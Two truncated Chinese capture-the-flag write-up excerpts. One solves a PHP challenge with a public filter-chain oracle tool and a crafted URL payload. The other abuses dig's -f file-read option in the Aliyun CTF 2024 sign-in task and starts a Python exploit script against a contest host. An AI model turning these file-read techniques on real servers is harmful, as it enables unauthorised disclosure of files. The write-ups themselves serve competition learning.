Simp1escape一血,ak没有其他方向一题分高,止步16名0x01 ezphp使用https://github.com/synacktiv/php_filter_chains_oracle_exploit leak flag.php的字符发现存在ezphpPhp8参数传入后显示代码,然后进行利用,触发匿名类即可flag.php?ezphpPhp8=class%40anonymous%0...
阿里云CTF 2024web 签到dig 命令-f参数能够读取文件,应该是过滤了空格,将命令和要读取的文件拼接到一起就行import base64 import requests url = "http://web0.aliyunctf.com:29059" + "/digHandler" data = { "domain&qu...